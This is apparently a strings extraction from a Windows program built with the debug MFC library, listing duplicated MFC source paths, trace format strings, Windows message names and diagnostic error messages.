Warning: unknown WM_MEASUREITEM for menu item 0xX.

Can't register window class named %s

Can't register window class named %s

Afx:%p:%x:%p:%p:%p

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

Afx:%p:%x

user32.dll

user32.dll

WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

Implementation Warning: control notification = $%X.

Implementation Warning: control notification = $%X.

Warning: not executing disabled command %d

Warning: not executing disabled command %d

hWnd = $X (nIDC=$X) is not a %hs.

hWnd = $X (nIDC=$X) is not a %hs.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h

commctrl_DragListMsg

commctrl_DragListMsg

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdlgs.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdlgs.inl

CCmdTarget

CCmdTarget

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp

SENDING control notification %d from control id 0xX to %hs window.

SENDING control notification %d from control id 0xX to %hs window.

SENDING command id 0xX to %hs target.

SENDING command id 0xX to %hs target.

No handler for command ID 0xX, disabling it.

No handler for command ID 0xX, disabling it.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp

m_nMsgLast =

m_nMsgLast =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp

RegDeleteKeyTransactedA

RegDeleteKeyTransactedA

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp

MRU: open file (%d) '%s'.

MRU: open file (%d) '%s'.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp

Error: failed to load message box prompt string 0xx.

Error: failed to load message box prompt string 0xx.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

Error: no data exchange control with ID 0xX.

Error: no data exchange control with ID 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp

Warning: dialog data checkbox value (%d) out of range.

Warning: dialog data checkbox value (%d) out of range.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp

m_ps.rcPaint =

m_ps.rcPaint =

m_ps.fErase =

m_ps.fErase =

m_ps.hdc =

m_ps.hdc =

lgpn.lopnColor =

lgpn.lopnColor =

lgpn.lopnWidth.x (width) =

lgpn.lopnWidth.x (width) =

lgpn.lopnStyle =

lgpn.lopnStyle =

lb.lbColor =

lb.lbColor =

lb.lbHatch =

lb.lbHatch =

lb.lbStyle =

lb.lbStyle =

lf.lfFaceName =

lf.lfFaceName =

lf.lfPitchAndFamily =

lf.lfPitchAndFamily =

lf.lfQuality =

lf.lfQuality =

lf.lfClipPrecision =

lf.lfClipPrecision =

lf.lfOutPrecision =

lf.lfOutPrecision =

lf.lfCharSet =

lf.lfCharSet =

lf.lfStrikeOut =

lf.lfStrikeOut =

lf.lfUnderline =

lf.lfUnderline =

lf.lfItalic =

lf.lfItalic =

lf.lfWeight =

lf.lfWeight =

lf.lfOrientation =

lf.lfOrientation =

lf.lfEscapement =

lf.lfEscapement =

lf.lfWidth =

lf.lfWidth =

lf.lfHeight =

lf.lfHeight =

bm.bmBitsPixel =

bm.bmBitsPixel =

bm.bmPlanes =

bm.bmPlanes =

bm.bmWidthBytes =

bm.bmWidthBytes =

bm.bmWidth =

bm.bmWidth =

bm.bmHeight =

bm.bmHeight =

bm.bmType =

bm.bmType =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp

CLSID\%s

CLSID\%s

Interface\%s

Interface\%s

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp

mfcm100d.dll

mfcm100d.dll

QueryInterface(%s) failed

QueryInterface(%s) failed

QueryInterface(%s) succeeded

QueryInterface(%s) succeeded

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp

AppMsg

AppMsg

WinMsg

WinMsg

CmdRouting

CmdRouting

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp

comctl32.dll

comctl32.dll

comdlg32.dll

comdlg32.dll

shell32.dll

shell32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrmx.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrmx.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp

Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.

Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdatarecovery.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdatarecovery.cpp

lXXxXXXXXXXX

lXXxXXXXXXXX

RegDeleteKeyExA

RegDeleteKeyExA

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp

%s:%x:%x:%x:%x

%s:%x:%x:%x:%x

Shell32.dll

Shell32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp

0xx

0xx

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp

IOleInPlaceObject not supported on OLE control (dialog ID %d).

IOleInPlaceObject not supported on OLE control (dialog ID %d).

Persistence not supported on OLE control %ls.

Persistence not supported on OLE control %ls.

%d. Column ordinal %d: Binding as native data type

%d. Column ordinal %d: Binding as native data type

%d. Column ordinal %d: Binding a COM object

%d. Column ordinal %d: Binding a COM object

F%d. Column ordinal %d: Binding as an IStream object

F%d. Column ordinal %d: Binding as an IStream object

%d. Column ordinal %d: Binding as an ISequentialStream object

%d. Column ordinal %d: Binding as an ISequentialStream object

neither ISequentialStream nor IStream are supported!

neither ISequentialStream nor IStream are supported!

IStream is supported

IStream is supported

FISequentialStream is supported

FISequentialStream is supported

Testing streams support...

Testing streams support...

%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory

%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory

%d. Column ordinal %d: Binding length and status ONLY

%d. Column ordinal %d: Binding length and status ONLY

Number of columns: %d

Number of columns: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h

Dw=Binding entry %d failed. Status: %d

Dw=Binding entry %d failed. Status: %d

Unsupported DBTYPE (%d) in column %d

Unsupported DBTYPE (%d) in column %d

$@Column %d not bound

$@Column %d not bound

GetData failed - HRESULT = 0x%X

GetData failed - HRESULT = 0x%X

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbasepane.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbasepane.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpane.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpane.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbar.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbar.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxvisualmanager.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxvisualmanager.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcontrolbarutil.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcontrolbarutil.h

%sMFCToolBar-%d%x

%sMFCToolBar-%d%x

%sMFCToolBar-%d

%sMFCToolBar-%d

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsettingsstore.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsettingsstore.h

%sMFCToolBarParameters

%sMFCToolBarParameters

TOOLBAR_RESETKEYBAORD

TOOLBAR_RESETKEYBAORD

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenu.cpp

&%d %s

&%d %s

Can't import menu

Can't import menu

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin4.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin4.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenubar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenubar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertoolsmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertoolsmanager.cpp

Too many user-defined tools. The max. number is %d

Too many user-defined tools. The max. number is %d

WM_HOTKEY

WM_HOTKEY

WM_SETHOTKEY

WM_SETHOTKEY

WM_IDLEUPDATECMDUI

WM_IDLEUPDATECMDUI

WM_DDE_EXECUTE

WM_DDE_EXECUTE

WM_KEYLAST

WM_KEYLAST

WM_SYSKEYUP

WM_SYSKEYUP

WM_SYSKEYDOWN

WM_SYSKEYDOWN

WM_KEYUP

WM_KEYUP

WM_KEYDOWN

WM_KEYDOWN

WM_VKEYTOITEM

WM_VKEYTOITEM

WM_CTLCOLORMSGBOX

WM_CTLCOLORMSGBOX

%s: hwnd=0xX, msg = 0xX (0xX, 0xX)

%s: hwnd=0xX, msg = 0xX (0xX, 0xX)

%s: hwnd=0xX, msg = %hs (0xX, 0xX)

%s: hwnd=0xX, msg = %hs (0xX, 0xX)

WM_USER 0xX

WM_USER 0xX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp

%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d

%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d

%s: Execute '%s'.

%s: Execute '%s'.

Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.

Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.

Warning: failed to reclaim %d bytes for memory safety pool.

Warning: failed to reclaim %d bytes for memory safety pool.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp

CFile exception: %hs, File %s, OS error information = %ld.

CFile exception: %hs, File %s, OS error information = %ld.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_u.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_u.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_sp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_sp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfile.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfile.cpp

m_ofn.lpstrCustomFilter =

m_ofn.lpstrCustomFilter =

m_ofn.lpstrFilter =

m_ofn.lpstrFilter =

m_ofn.nFileExtension =

m_ofn.nFileExtension =

m_ofn.nFileOffset =

m_ofn.nFileOffset =

m_ofn.lpstrDefExt =

m_ofn.lpstrDefExt =

m_ofn.Flags =

m_ofn.Flags =

m_ofn.lpstrTitle =

m_ofn.lpstrTitle =

m_ofn.nMaxFileTitle =

m_ofn.nMaxFileTitle =

m_ofn.lpstrFileTitle =

m_ofn.lpstrFileTitle =

m_ofn.nMaxFile =

m_ofn.nMaxFile =

m_ofn.lpstrFile =

m_ofn.lpstrFile =

m_ofn.nFilterIndex =

m_ofn.nFilterIndex =

m_ofn.hwndOwner =

m_ofn.hwndOwner =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprop.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprop.cpp

m_psp.dwFlags =

m_psp.dwFlags =

PropertySheet() failed: GetLastError returned %d

PropertySheet() failed: GetLastError returned %d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\barcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\barcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

Warning: could not get volume information '%s'.

Warning: could not get volume information '%s'.

Warning: could not parse the path '%s'. Path is too long.

Warning: could not parse the path '%s'. Path is too long.

Warning: could not parse the path '%s'.

Warning: could not parse the path '%s'.

kernel32.dll

kernel32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Error: failed to execute DDE command '%s'.

Error: failed to execute DDE command '%s'.

Warning: DDE command '%s' ignored because window is disabled.

Warning: DDE command '%s' ignored because window is disabled.

Warning: no message line prompt for ID 0xX.

Warning: no message line prompt for ID 0xX.

Warning: OnUpdateKeyIndicator - unknown indicator 0xX.

Warning: OnUpdateKeyIndicator - unknown indicator 0xX.

Warning: scroll bars in frame windows may cause unusual behaviour.

Warning: scroll bars in frame windows may cause unusual behaviour.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl3.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl3.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp

Error: failed to load AfxFormatString string 0xx.

Error: failed to load AfxFormatString string 0xx.

Error: illegal string index requested %d.

Error: illegal string index requested %d.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp

ole32.dll

ole32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h

CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)

CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp

%sDockingManager-%d

%sDockingManager-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp

CMenuImages. Can't load menu images %x

CMenuImages. Can't load menu images %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp

KeyboardManager

KeyboardManager

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp

MSG_CHECKEMPTYMINIFRAME

MSG_CHECKEMPTYMINIFRAME

CMDITabProxyWnd

CMDITabProxyWnd

CMDIChildWndEx

CMDIChildWndEx

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp

Setting of tab order failed, error code: %x

Setting of tab order failed, error code: %x

Registration of tab failed, error code: %x

Registration of tab failed, error code: %x

Creation of tab proxy window failed, error code: %d

Creation of tab proxy window failed, error code: %d

CMDIChildWndEx::SetTaskbarTabProperties failed with code %x

CMDIChildWndEx::SetTaskbarTabProperties failed with code %x

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h

SetTaskbarThumbnailClipRect failed with code %x.

SetTaskbarThumbnailClipRect failed with code %x.

pfnSetIconicThumbnail failed with code %x

pfnSetIconicThumbnail failed with code %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp

CMDIFrameWndEx

CMDIFrameWndEx

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp

Warning: OleInitialize returned scode = %s.

Warning: OleInitialize returned scode = %s.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp

Can't open URL: %s

Can't open URL: %s

MFCLink_UrlPrefix

MFCLink_UrlPrefix

MFCLink_Url

MFCLink_Url

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp

Can't load bitmap: %x

Can't load bitmap: %x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp

Error: unknown image type '%u'

Error: unknown image type '%u'

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp

Can't load bitmap: %s. GetLastError() = %x

Can't load bitmap: %s. GetLastError() = %x

Can't load bitmap: %x. GetLastError() = %x

Can't load bitmap: %x. GetLastError() = %x

CMFCToolBarImages::CopyImageToClipboard error. Error code = %x

CMFCToolBarImages::CopyImageToClipboard error. Error code = %x

Can't create dialog: %s

Can't create dialog: %s

